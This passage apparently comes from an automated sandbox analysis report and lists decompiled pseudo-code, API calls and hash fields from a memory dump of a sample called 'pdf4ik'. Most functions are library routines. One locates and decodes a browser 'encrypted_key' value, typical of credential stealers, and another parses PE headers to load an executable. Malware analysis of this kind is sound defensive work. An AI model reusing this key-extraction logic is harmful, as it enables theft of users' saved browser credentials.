				if(_t77 > 0x3c3c3c3) {
					E29DAD440("vector<T> too long");
				}
				_t36 = (0x78787879 * ( *((intOrPtr*)(_t82 + 8)) -  *_t82) >> 0x20 >> 5 >> 0x1f) + (0x78787879 * ( *((intOrPtr*)(_t82 + 8)) -  *_t82) >> 0x20 >> 5);
				if(_t36 < _t77) {
					_t37 = E29D89660(_t77, _t77, _t82);
					_v8 = 0;
					_push(_a4);
					_v24 = _t37;
					E29D89E10( *_t82,  *((intOrPtr*)(_t82 + 4)), _t37);
					_t80 =  *((intOrPtr*)(_t82 + 4));
					_t59 =  *_t82;
					_t51 = (0x78787879 * ( *((intOrPtr*)(_t82 + 4)) - _t59) >> 0x20 >> 5 >> 0x1f) + (0x78787879 * ( *((intOrPtr*)(_t82 + 4)) - _t59) >> 0x20 >> 5);
					if(_t59 != 0) {
						_push(_a4);
						E29D89DB0(_t59, _t80);
						_push( *_t82);
						E29DADF3B();
					}
					_t36 = _v24;
					 *((intOrPtr*)(_t82 + 8)) = _t36 + ((_a4 << 4) + _a4) * 4;
					 *((intOrPtr*)(_t82 + 4)) = _t36 + ((_t51 << 4) + _t51) * 4;
					 *_t82 = _t36;
				}
				 *[fs:0x0] = _v16;
				return _t36;
			}


















                                        0x29d893c3
                                        0x29d893c5
                                        0x29d893d0
                                        0x29d893d7
                                        0x29d893de
                                        0x29d893e2
                                        0x29d893e8
                                        0x29d893eb
                                        0x29d893ed
                                        0x29d893f6
                                        0x29d893fd
                                        0x29d893fd
                                        0x29d89416
                                        0x29d8941a
                                        0x29d8941e
                                        0x29d89423
                                        0x29d89432
                                        0x29d89435
                                        0x29d89438
                                        0x29d8943d
                                        0x29d89440
                                        0x29d89458
                                        0x29d8945c
                                        0x29d89461
                                        0x29d89464
                                        0x29d8946b
                                        0x29d8946c
                                        0x29d89471
                                        0x29d8947e
                                        0x29d8948b
                                        0x29d89491
                                        0x29d89494
                                        0x29d89494
                                        0x29d89499
                                        0x29d894a7

                                        APIs
                                        • std::_Xinvalid_argument.LIBCPMT ref: 29D893FD
                                          • Part of subcall function 29DAD440: std::exception::exception.LIBCMT ref: 29DAD455
                                          • Part of subcall function 29DAD440: __CxxThrowException@8.LIBCMT ref: 29DAD46A
                                          • Part of subcall function 29DAD440: std::exception::exception.LIBCMT ref: 29DAD47B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
                                        • String ID: vector<T> too long$yxxx$yxxx
                                        • API String ID: 1823113695-1517697755
                                        • Opcode ID: 31f96c04505d851a5ab37845352a182b8e98d4ba7e43d42a930b49fa8e315d80
                                        • Instruction ID: 7fce7fa50d4e3de5585cae2fb0648a32da0b8978d454fec0ac78d050827dc99c
                                        • Opcode Fuzzy Hash: 31f96c04505d851a5ab37845352a182b8e98d4ba7e43d42a930b49fa8e315d80
                                        • Instruction Fuzzy Hash: B221D6B6B00205AFC718CF5DC894A6AB7E6FFD8250F15C62DE946DB744EA30B901CB90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29D957D0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 82COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E29D957D0(void* __ebx, signed int __ecx, intOrPtr* __esi, char _a4) {
				intOrPtr _t17;
				intOrPtr* _t19;
				char* _t27;
				void* _t31;
				intOrPtr _t35;
				intOrPtr _t36;
				signed int _t42;
				intOrPtr* _t47;

				_t47 = __esi;
				_t31 = __ebx;
				_t17 =  *((intOrPtr*)(__esi + 0x10));
				if((__ecx | 0xffffffff) - _t17 <= __ebx) {
					_t17 = E29DAD440("string too long");
				}
				if(_t31 == 0) {
					L23:
					return _t47;
				} else {
					_t42 = _t17 + _t31;
					if(_t42 > 0xfffffffe) {
						_t17 = E29DAD440("string too long");
					}
					_t35 =  *((intOrPtr*)(_t47 + 0x14));
					if(_t35 >= _t42) {
						if(_t42 != 0) {
							goto L7;
						} else {
							 *((intOrPtr*)(_t47 + 0x10)) = _t42;
							if(_t35 < 0x10) {
								_t27 = _t47;
								 *_t27 = 0;
								return _t27;
							} else {
								 *((char*)( *_t47)) = 0;
								return _t47;
							}
						}
					} else {
						E29D89750(_t47, _t42, _t17);
						if(_t42 == 0) {
							L22:
							goto L23;
						} else {
							L7:
							_t36 =  *((intOrPtr*)(_t47 + 0x10));
							if(_t31 != 1) {
								if( *((intOrPtr*)(_t47 + 0x14)) < 0x10) {
									_t19 = _t47;
								} else {
									_t19 =  *_t47;
								}
								E29DB5640(_t19 + _t36, _a4, _t31);
							} else {
								if( *((intOrPtr*)(_t47 + 0x14)) < 0x10) {
									 *((char*)(_t47 + _t36)) = _a4;
								} else {
									 *((char*)( *_t47 + _t36)) = _a4;
								}
							}
							 *((intOrPtr*)(_t47 + 0x10)) = _t42;
							if( *((intOrPtr*)(_t47 + 0x14)) < 0x10) {
								 *((char*)(_t47 + _t42)) = 0;
								goto L22;
							} else {
								 *((char*)( *_t47 + _t42)) = 0;
								return _t47;
							}
						}
					}
				}
			}











                                        0x29d957d0
                                        0x29d957d0
                                        0x29d957d3
                                        0x29d957dd
                                        0x29d957e4
                                        0x29d957e4
                                        0x29d957eb
                                        0x29d95896
                                        0x29d95899
                                        0x29d957f1
                                        0x29d957f2
                                        0x29d957f8
                                        0x29d957ff
                                        0x29d957ff
                                        0x29d95804
                                        0x29d95809
                                        0x29d95832
                                        0x00000000
                                        0x29d95834
                                        0x29d95834
                                        0x29d9583a
                                        0x29d95848
                                        0x29d9584a
                                        0x29d9584f
                                        0x29d9583c
                                        0x29d9583e
                                        0x29d95845
                                        0x29d95845
                                        0x29d9583a
                                        0x29d9580b
                                        0x29d9580f
                                        0x29d95816
                                        0x29d95895
                                        0x00000000
                                        0x29d95818
                                        0x29d95818
                                        0x29d95818
                                        0x29d9581e
                                        0x29d95860
                                        0x29d95866
                                        0x29d95862
                                        0x29d95862
                                        0x29d95862
                                        0x29d95871
                                        0x29d95820
                                        0x29d95824
                                        0x29d95857
                                        0x29d95826
                                        0x29d9582b
                                        0x29d9582b
                                        0x29d95824
                                        0x29d9587d
                                        0x29d95880
                                        0x29d95891
                                        0x00000000
                                        0x29d95882
                                        0x29d95884
                                        0x29d9588c
                                        0x29d9588c
                                        0x29d95880
                                        0x29d95816
                                        0x29d95809

                                        APIs
                                        • std::_Xinvalid_argument.LIBCPMT ref: 29D957E4
                                          • Part of subcall function 29DAD440: std::exception::exception.LIBCMT ref: 29DAD455
                                          • Part of subcall function 29DAD440: __CxxThrowException@8.LIBCMT ref: 29DAD46A
                                          • Part of subcall function 29DAD440: std::exception::exception.LIBCMT ref: 29DAD47B
                                        • std::_Xinvalid_argument.LIBCPMT ref: 29D957FF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw
                                        • String ID: string too long
                                        • API String ID: 963545896-2556327735
                                        • Opcode ID: bc5b25de3365b24899d5d97e670fccd878ab1431f72e9f97c2afe313ff8055c7
                                        • Instruction ID: 320f1872745fdbea6e88a7950d2b3aed4a82ffa3b19649343852acd289697613
                                        • Opcode Fuzzy Hash: bc5b25de3365b24899d5d97e670fccd878ab1431f72e9f97c2afe313ff8055c7
                                        • Instruction Fuzzy Hash: 51214F717243408BE3259E1CD840929BBE9DFA6610F100A7EEDD28BF51C7B19447E3A1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29D84870 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 92%
                                        			E29D84870(intOrPtr* __ebx, void* __edi, intOrPtr* __esi) {
				intOrPtr _t21;
				signed int _t24;
				intOrPtr _t25;
				signed int _t26;
				intOrPtr* _t40;

				if( *((intOrPtr*)(__ebx + 4)) < 0x40) {
					L9:
					return 1;
				} else {
					E29DB0010(__esi,  *__ebx, 0x40);
					if( *__esi != 0x5a4d) {
						L12:
						return 2;
					} else {
						_t21 =  *((intOrPtr*)(__esi + 0x3c));
						if(_t21 == 0) {
							goto L12;
						} else {
							if(_t21 + 0xf8 >  *((intOrPtr*)(__ebx + 4))) {
								goto L9;
							} else {
								_push(__edi);
								_t40 = __esi + 0x40;
								E29DB0010(_t40,  *__ebx + _t21, 0xf8);
								if( *_t40 != 0x4550 ||  *((intOrPtr*)(__esi + 0x58)) != 0x10b) {
									L11:
									return 2;
								} else {
									_t24 =  *(__esi + 0x46) & 0x0000ffff;
									if(_t24 == 0) {
										goto L11;
									} else {
										_t42 = _t24 + _t24 * 4;
										_t43 = _t24 + _t24 * 4 + _t42;
										_t45 = _t24 + _t24 * 4 + _t42 + _t43 + _t24 + _t24 * 4 + _t42 + _t43;
										 *((intOrPtr*)(__esi + 0x140)) = _t24 + _t24 * 4 + _t42 + _t43 + _t24 + _t24 * 4 + _t42 + _t43;
										_t25 = E29DADFE0(0x10b, _t24 + _t24 * 4 + _t42 + _t43 + _t24 + _t24 * 4 + _t42 + _t43, __esi, _t24 + _t24 * 4 + _t42 + _t43 + _t24 + _t24 * 4 + _t42 + _t43);
										 *((intOrPtr*)(__esi + 0x138)) = _t25;
										if(_t25 != 0) {
											 *((intOrPtr*)(__esi + 0x13c)) = ( *(__esi + 0x54) & 0x0000ffff) +  *((intOrPtr*)(__esi + 0x3c)) + 0x18;
											_t26 = E29D84EF0(__esi, _t25, ( *(__esi + 0x54) & 0x0000ffff) +  *((intOrPtr*)(__esi + 0x3c)) + 0x18, _t45, __ebx);
											asm("sbb eax, eax");
											return  ~_t26 + 1;
										} else {
											return 3;
										}
									}
								}
							}
						}
					}
				}
			}








                                        0x29d84874
                                        0x29d84908
                                        0x29d8490d
                                        0x29d8487a
                                        0x29d84880
                                        0x29d84890
                                        0x29d84939
                                        0x29d8493e
                                        0x29d84896
                                        0x29d84896
                                        0x29d8489b
                                        0x00000000
                                        0x29d848a1
                                        0x29d848aa
                                        0x00000000
                                        0x29d848ac
                                        0x29d848ae
                                        0x29d848b7
                                        0x29d848bb
                                        0x29d848c9
                                        0x29d84932
                                        0x29d84938
                                        0x29d848d6
                                        0x29d848d6
                                        0x29d848dd
                                        0x00000000
                                        0x29d848df
                                        0x29d848df
                                        0x29d848e2
                                        0x29d848e6
                                        0x29d848e9
                                        0x29d848ef
                                        0x29d848f7
                                        0x29d848ff
                                        0x29d8491d
                                        0x29d84923
                                        0x29d8492d
                                        0x29d84931
                                        0x29d84901
                                        0x29d84907
                                        0x29d84907
                                        0x29d848ff
                                        0x29d848dd
                                        0x29d848c9
                                        0x29d848aa
                                        0x29d8489b
                                        0x29d84890

                                        APIs
                                        • _memmove.LIBCMT ref: 29D84880
                                        • _memmove.LIBCMT ref: 29D848BB
                                        • _malloc.LIBCMT ref: 29D848EF
                                          • Part of subcall function 29DADFE0: __FF_MSGBANNER.LIBCMT ref: 29DADFF9
                                          • Part of subcall function 29DADFE0: __NMSG_WRITE.LIBCMT ref: 29DAE000
                                          • Part of subcall function 29DADFE0: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,29D84BED,00000000), ref: 29DAE025
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _memmove$AllocateHeap_malloc
                                        • String ID: @
                                        • API String ID: 2758062913-2766056989
                                        • Opcode ID: d8dc692ed96f1db9e76841082e597a28353635ae11b8252da0b51d6726e11141
                                        • Instruction ID: 0b20c148dad6af0a99a82dd40c52fbd980d48ab171a3145d28aa6fad908fa199
                                        • Opcode Fuzzy Hash: d8dc692ed96f1db9e76841082e597a28353635ae11b8252da0b51d6726e11141
                                        • Instruction Fuzzy Hash: 041124716002009BD734DF2AE890BAA33E4FF81700F80486DE59A8BE86E774F543E750
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29D9572D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 82%
                                        			E29D9572D(signed int __ecx, signed int __edi) {
				intOrPtr* _t26;
				signed int _t28;
				signed int _t31;
				char _t39;
				signed int _t41;
				signed int _t47;
				signed int _t49;
				void* _t51;

				_t47 = __edi;
				_t41 = __ecx;
				_t49 =  *(_t51 + 8);
				if( *(_t49 + 0x14) >= 0x10) {
					_push( *__esi);
					E29DADF3B();
					__esp = __esp + 4;
				}
				 *(_t49 + 0x14) = 0xf;
				 *(_t49 + 0x10) = 0;
				 *_t49 = 0;
				E29DAFF06(0, 0);
				L12:
				while(1) {
					if(_t47 != 0) {
						L8:
						_t41 =  *(_t49 + 0x10);
						if( *(_t49 + 0x14) < 0x10) {
							_t28 = _t49;
						} else {
							_t28 =  *_t49;
						}
						 *((char*)(_t28 + _t41)) = _t39;
						 *(_t49 + 0x10) = _t47;
						if( *(_t49 + 0x14) < 0x10) {
							 *((char*)(_t49 + _t47)) = 0;
							goto L20;
						} else {
							 *((char*)( *_t49 + _t47)) = 0;
							_t26 =  *((intOrPtr*)(_t51 + 0xc)) + 1;
							 *((intOrPtr*)(_t51 + 0xc)) = _t26;
							L1:
							if(_t26 ==  *((intOrPtr*)(_t51 + 0x10))) {
								 *[fs:0x0] =  *((intOrPtr*)(_t51 - 0xc));
								return _t26;
							}
							_t39 =  *_t26;
							_t31 =  *(_t49 + 0x10);
							if((_t41 | 0xffffffff) - _t31 <= 1) {
								_t31 = E29DAD440("string too long");
							}
							_t5 = _t31 + 1; // 0x1
							_t47 = _t5;
							if(_t47 > 0xfffffffe) {
								_t31 = E29DAD440("string too long");
							}
							_t41 =  *(_t49 + 0x14);
							if(_t41 >= _t47) {
								continue;
							} else {
								_t41 = _t49;
								E29D89750(_t41, _t47, _t31);
								if(_t47 == 0) {
									L20:
									_t26 =  *((intOrPtr*)(_t51 + 0xc)) + 1;
									 *((intOrPtr*)(_t51 + 0xc)) = _t26;
									goto L1;
								}
								goto L8;
							}
						}
					}
					 *(_t49 + 0x10) = _t47;
					if(_t41 < 0x10) {
						 *_t49 = 0;
						_t26 =  *((intOrPtr*)(_t51 + 0xc)) + 1;
						 *((intOrPtr*)(_t51 + 0xc)) = _t26;
					} else {
						 *( *_t49) = 0;
						_t26 =  *((intOrPtr*)(_t51 + 0xc)) + 1;
						 *((intOrPtr*)(_t51 + 0xc)) = _t26;
					}
					goto L1;
				}
			}











                                        0x29d9572d
                                        0x29d9572d
                                        0x29d9572d
                                        0x29d95734
                                        0x29d95738
                                        0x29d95739
                                        0x29d9573e
                                        0x29d9573e
                                        0x29d95743
                                        0x29d9574a
                                        0x29d95753
                                        0x29d95756
                                        0x00000000
                                        0x29d9575b
                                        0x29d9575d
                                        0x29d9571c
                                        0x29d9571c
                                        0x29d95727
                                        0x29d95789
                                        0x29d95729
                                        0x29d95729
                                        0x29d95729
                                        0x29d9578b
                                        0x29d9578e
                                        0x29d95794
                                        0x29d957aa
                                        0x00000000
                                        0x29d95796
                                        0x29d95798
                                        0x29d9579f
                                        0x29d957a0
                                        0x29d956d0
                                        0x29d956d3
                                        0x29d957bd
                                        0x29d957cb
                                        0x29d957cb
                                        0x29d956d9
                                        0x29d956db
                                        0x29d956e6
                                        0x29d956ed
                                        0x29d956ed
                                        0x29d956f2
                                        0x29d956f2
                                        0x29d956f8
                                        0x29d956ff
                                        0x29d956ff
                                        0x29d95704
                                        0x29d95709
                                        0x00000000
                                        0x29d9570b
                                        0x29d9570d
                                        0x29d9570f
                                        0x29d95716
                                        0x29d957ae
                                        0x29d957b1
                                        0x29d957b2
                                        0x00000000
                                        0x29d957b2
                                        0x00000000
                                        0x29d95716
                                        0x29d95709
                                        0x29d95794
                                        0x29d9575f
                                        0x29d95765
                                        0x29d9577a
                                        0x29d95780
                                        0x29d95781
                                        0x29d95767
                                        0x29d95769
                                        0x29d9576f
                                        0x29d95770
                                        0x29d95770
                                        0x00000000
                                        0x29d95765

                                        APIs
                                        • std::_Xinvalid_argument.LIBCPMT ref: 29D956ED
                                        • std::_Xinvalid_argument.LIBCPMT ref: 29D956FF
                                        • __CxxThrowException@8.LIBCMT ref: 29D95756
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Xinvalid_argumentstd::_$Exception@8Throw
                                        • String ID: string too long
                                        • API String ID: 2310008865-2556327735
                                        • Opcode ID: 97a0a796f14cffcd49dd7c1381f1f41c2fc84011851445efd69e93a510fa89e6
                                        • Instruction ID: c6fd0946ec154af5aa53ba96725bc14eeae742bf527e5416ec69a84e4457adfe
                                        • Opcode Fuzzy Hash: 97a0a796f14cffcd49dd7c1381f1f41c2fc84011851445efd69e93a510fa89e6
                                        • Instruction Fuzzy Hash: DF21C638120740DFE325DF24C490B1A77F1AF51310F508A6CD9D24BE81DB71A647EB61
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29D89250 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 43COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E29D89250(intOrPtr* __ecx) {
				unsigned int _t15;
				signed int _t16;
				intOrPtr* _t19;
				unsigned int _t29;
				intOrPtr _t30;
				void* _t35;
				signed int _t36;

				_t19 = __ecx;
				_t30 =  *__ecx;
				_t35 = (0x78787879 * ( *((intOrPtr*)(__ecx + 4)) - _t30) >> 0x20 >> 5 >> 0x1f) + (0x78787879 * ( *((intOrPtr*)(__ecx + 4)) - _t30) >> 0x20 >> 5);
				if(_t35 > 0x3c3c3c2) {
					E29DAD440("vector<T> too long");
				}
				_t36 = _t35 + 1;
				_t15 = (0x78787879 * ( *((intOrPtr*)(_t19 + 8)) - _t30) >> 0x20 >> 5 >> 0x1f) + (0x78787879 * ( *((intOrPtr*)(_t19 + 8)) - _t30) >> 0x20 >> 5);
				if(_t36 > _t15) {
					_t29 = _t15 >> 1;
					if(0x3c3c3c3 - _t29 >= _t15) {
						_t16 = _t15 + _t29;
					} else {
						_t16 = 0;
					}
					if(_t16 < _t36) {
						_t16 = _t36;
					}
					return E29D893C0(_t19, _t16);
				}
				return _t15;
			}










                                        0x29d89250
                                        0x29d89255
                                        0x29d89268
                                        0x29d89270
                                        0x29d89277
                                        0x29d89277
                                        0x29d89290
                                        0x29d89291
                                        0x29d89295
                                        0x29d89299
                                        0x29d892a4
                                        0x29d892aa
                                        0x29d892a6
                                        0x29d892a6
                                        0x29d892a6
                                        0x29d892ae
                                        0x29d892b0
                                        0x29d892b0
                                        0x00000000
                                        0x29d892b3
                                        0x29d892ba

                                        APIs
                                        • std::_Xinvalid_argument.LIBCPMT ref: 29D89277
                                          • Part of subcall function 29DAD440: std::exception::exception.LIBCMT ref: 29DAD455
                                          • Part of subcall function 29DAD440: __CxxThrowException@8.LIBCMT ref: 29DAD46A
                                          • Part of subcall function 29DAD440: std::exception::exception.LIBCMT ref: 29DAD47B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
                                        • String ID: vector<T> too long$yxxx$yxxx
                                        • API String ID: 1823113695-1517697755
                                        • Opcode ID: f25ab4cac38e48f2caba86618489450b4b67473b843c4e28878d4476449dd3dd
                                        • Instruction ID: 92338325696e8bad7c053c88c3949470c5fae7777616d68d1477b7f7a377d3a5
                                        • Opcode Fuzzy Hash: f25ab4cac38e48f2caba86618489450b4b67473b843c4e28878d4476449dd3dd
                                        • Instruction Fuzzy Hash: EBF0BB67B000212F8308947DCC8854FA9476AE52903AAD769D986DFB5EDC31EC83A1D0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29D99300 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 146memoryCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 80%
                                        			E29D99300(intOrPtr __ecx, long __edx, CHAR* _a4) {
				intOrPtr _v8;
				char _v16;
				signed int _v20;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v48;
				intOrPtr _v52;
				long* _v56;
				char _v60;
				char _v64;
				intOrPtr _v68;
				long _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t42;
				signed int _t43;
				void* _t46;
				intOrPtr _t47;
				char* _t50;
				long* _t58;
				void* _t60;
				intOrPtr _t67;
				long* _t68;
				char* _t69;
				char* _t76;
				char* _t84;
				intOrPtr _t89;
				char* _t90;
				char* _t91;
				intOrPtr _t96;
				char _t97;
				long* _t100;
				signed int _t101;
				void* _t102;
				void* _t104;

				_t85 = __edx;
				_push(0xffffffff);
				_push(E29DC1EC8);
				_push( *[fs:0x0]);
				_t42 =  *0x29dd5664; // 0xd9555f04
				_t43 = _t42 ^ _t101;
				_v20 = _t43;
				_push(_t43);
				 *[fs:0x0] =  &_v16;
				_v68 = __ecx;
				_v72 = __edx;
				_v52 = 0;
				_t46 = E29D99120(_a4,  &_v56,  &_v60);
				_t104 = _t102 - 0x38 + 4;
				if(_t46 == 0) {
					L26:
					_t47 = 0;
					L24:
					 *[fs:0x0] = _v16;
					_pop(_t89);
					_pop(_t96);
					_pop(_t67);
					return E29DADF46(_t47, _t67, _v20 ^ _t101, _t85, _t89, _t96);
				}
				_t97 = _v60;
				if(_t97 == 0) {
					goto L26;
				}
				_t68 = _v56;
				if(_t68 == 0) {
					goto L26;
				}
				_t85 = _t68 + 1;
				_t90 = LocalAlloc(0x40, _t68 + 1);
				if(_t90 == 0) {
					L23:
					_t47 = _v52;
					goto L24;
				}
				if(_t68 == 0) {
					L7:
					_t50 = StrStrA(_t90, "encrypted_key");
					if(_t50 == 0) {
						_t47 = 0;
						goto L24;
					} else {
						_t51 =  &(_t50[0x10]);
						_t76 =  &(_t50[0x10]);
						_v28 = 0xf;
						_v32 = 0;
						_v48 = 0;
						_t16 =  &(_t76[1]); // -15
						_t91 = _t16;
						do {
							_t85 =  *_t76;
							_t76 =  &(_t76[1]);
						} while (_t85 != 0);
						E29D892C0( &_v48, _t51, _t76 - _t91);
						_v8 = 0;
						if(E29D95240(0,  &_v48, "\"}", 2) != 0xffffffff) {
							E29D896C0( &_v48, _t54, 0xffffffff);
						}
						_t69 = _v48;
						if(_v28 < 0x10) {
							_t69 =  &_v48;
						}
						if(E29D991B0( &_v64, _t69,  &_v56) != 0) {
							_t81 = _v64;
							if(_v64 >= 5) {
								_t58 = _v56;
								_t85 =  *_t58;
								if( *_t58 ==  *0x29dcdef4 && _t58[1] == 0x49) {
									_t85 =  &_v60;
									_t60 = E29D99210( &(_t58[1]), _t81 + 0xfffffffb,  &_v56,  &_v60);
									_t104 = _t104 + 4;
									if(_t60 != 0 && _v56 == 0x20) {
										_v52 = 1;
										E29D99280(_v72, _v68, _v60);
										_t104 = _t104 + 4;
									}
								}
							}
						}
						if(_v28 >= 0x10) {
							_push(_v48);
							E29DADF3B();
						}
						goto L23;
					}
				} else {
					_t84 = _t90;
					_t85 = _t97 - _t90;
					_t100 = _t68;
					do {
						 *_t84 = _t84[_t85];
						_t84 =  &(_t84[1]);
						_t100 = _t100 - 1;
					} while (_t100 != 0);
					goto L7;
				}
			}







































                                        0x29d99300
                                        0x29d99303
                                        0x29d99305
                                        0x29d99310
                                        0x29d99314
                                        0x29d99319
                                        0x29d9931b
                                        0x29d99321
                                        0x29d99325
                                        0x29d9932e
                                        0x29d9933a
                                        0x29d9933d
                                        0x29d99340
                                        0x29d99345
                                        0x29d9934a
                                        0x29d9949b
                                        0x29d9949b
                                        0x29d9947b
                                        0x29d9947e
                                        0x29d99486
                                        0x29d99487
                                        0x29d99488
                                        0x29d99496
                                        0x29d99496
                                        0x29d99350
                                        0x29d99355
                                        0x00000000
                                        0x00000000
                                        0x29d9935b
                                        0x29d99360
                                        0x00000000
                                        0x00000000
                                        0x29d99366
                                        0x29d99372
                                        0x29d99376
                                        0x29d99478
                                        0x29d99478
                                        0x00000000
                                        0x29d99478
                                        0x29d9937e
                                        0x29d99391
                                        0x29d99397
                                        0x29d993a1
                                        0x29d99497
                                        0x00000000
                                        0x29d993a7
                                        0x29d993a7
                                        0x29d993aa
                                        0x29d993ac
                                        0x29d993b3
                                        0x29d993b6
                                        0x29d993ba
                                        0x29d993ba
                                        0x29d993c0
                                        0x29d993c0
                                        0x29d993c2
                                        0x29d993c3
                                        0x29d993ce
                                        0x29d993e0
                                        0x29d993eb
                                        0x29d993f3
                                        0x29d993f3
                                        0x29d993fc
                                        0x29d993ff
                                        0x29d99401
                                        0x29d99401
                                        0x29d99411
                                        0x29d99413
                                        0x29d99419
                                        0x29d9941b
                                        0x29d9941e
                                        0x29d99426
                                        0x29d9942e
                                        0x29d9943b
                                        0x29d99440
                                        0x29d99445
                                        0x29d99457
                                        0x29d9945e
                                        0x29d99463
                                        0x29d99463
                                        0x29d99445
                                        0x29d99426
                                        0x29d99419
                                        0x29d9946a
                                        0x29d9946f
                                        0x29d99470
                                        0x29d99475
                                        0x00000000
                                        0x29d9946a
                                        0x29d99380
                                        0x29d99382
                                        0x29d99384
                                        0x29d99386
                                        0x29d99388
                                        0x29d9938b
                                        0x29d9938d
                                        0x29d9938e
                                        0x29d9938e
                                        0x00000000
                                        0x29d99388

                                        APIs
                                          • Part of subcall function 29D99120: CreateFileA.KERNEL32(29D9F877,80000000,00000001,00000000,00000003,00000000,00000000,00000000,00000000,?,D9555F04,00000008,00000000,00000000), ref: 29D99137
                                          • Part of subcall function 29D99120: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000000,29DC1EC8,000000FF,?,29D9F877,?), ref: 29D9914D
                                          • Part of subcall function 29D99120: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,00000000,29DC1EC8,000000FF,?,29D9F877,?), ref: 29D99164
                                          • Part of subcall function 29D99120: ReadFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,?,?,?,?,?,?,00000000,29DC1EC8,000000FF), ref: 29D9917D
                                          • Part of subcall function 29D99120: LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000,29DC1EC8,000000FF,?,29D9F877,?), ref: 29D99199
                                          • Part of subcall function 29D99120: CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000,29DC1EC8,000000FF,?,29D9F877,?), ref: 29D991A0
                                        • LocalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,?,?,00000000,29DC1EC8,000000FF,?,29D9F877), ref: 29D9936C
                                        • StrStrA.SHLWAPI(00000000,encrypted_key,?,?,?,?,?,?,?,?,00000000,29DC1EC8,000000FF,?,29D9F877,?), ref: 29D99397
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: FileLocal$Alloc$CloseCreateFreeHandleReadSize
                                        • String ID: $encrypted_key
                                        • API String ID: 3874507483-1487440752
                                        • Opcode ID: ec740e454ed76bf772f8f162f56528b63672a032a8971a981f56e064646a3398
                                        • Instruction ID: 3eef530e9b76ef94fb7c48f4a761428786c01461ef20bbbde6a9a3bf138b9740
                                        • Opcode Fuzzy Hash: ec740e454ed76bf772f8f162f56528b63672a032a8971a981f56e064646a3398
                                        • Instruction Fuzzy Hash: 7A51E971D10208ABEB05DFA4D980BEEB775EF54710F54821DE511B7681DB306907DBA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29D8C870 Relevance: 6.1, APIs: 4, Instructions: 143COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 95%
                                        			E29D8C870(void __eax) {
				char _v8;
				char _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v112;
				char _v116;
				intOrPtr _v120;
				intOrPtr _v136;
				char _v140;
				char _v144;
				void _v148;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t42;
				void* _t49;
				void* _t51;
				intOrPtr _t54;
				void* _t64;
				void* _t78;
				intOrPtr _t85;
				intOrPtr _t89;
				signed int _t91;
				void _t96;

				_t96 = __eax;
				if(__eax == 0) {
					L27:
					return 0;
				} else {
					_t91 = 0;
					_v148 = 0;
					E29DB5640( &_v144, 0, 0x7c);
					_t42 = E29D8C6A0(_t96);
					_v20 = _t42;
					if(_t42 == 0xffffffff) {
						L7:
						_t91 = _t91 | 0xffffffff;
					} else {
						if( *_t96 == 0) {
